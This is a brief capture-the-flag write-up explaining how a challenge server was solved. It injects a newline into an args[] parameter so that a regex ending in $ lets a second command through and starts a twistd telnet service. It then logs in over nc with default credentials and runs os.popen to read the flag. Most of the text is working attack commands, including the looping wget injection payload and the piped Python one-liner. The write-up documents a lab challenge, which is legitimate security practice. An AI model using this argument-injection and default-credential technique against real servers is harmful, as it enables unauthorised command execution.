This challenge was solved by one of my teammates, nguyen and me and the write up was written by me.
Run this on one thread:
while true; do wget -qO- "http://52.68.245.164/?args[]=abc%0a&args[]=twistd&args[]=telnet" > /dev/null; doneThis works because $ in regex allows \n too (\Z would not allow this), so it will run the following commands:
/bin/orange abc
twistd telnetConnect on another thread: nc 52.68.245.164 4040 (this is the port of the twistd telnet service), user/pass: admin/changeme (default credentials) and execute this until you got the flag: import os;print os.popen("/read_flag").read();
python -c "import sys;sys.stdout.write(\"admin\r\nchangeme\r\nimport os;
print '%r'%os.popen('/read_flag').read();\r\n\")"|nc 52.68.245.164 4040Sometimes you have to try it multiple times, because the process is killed very fast.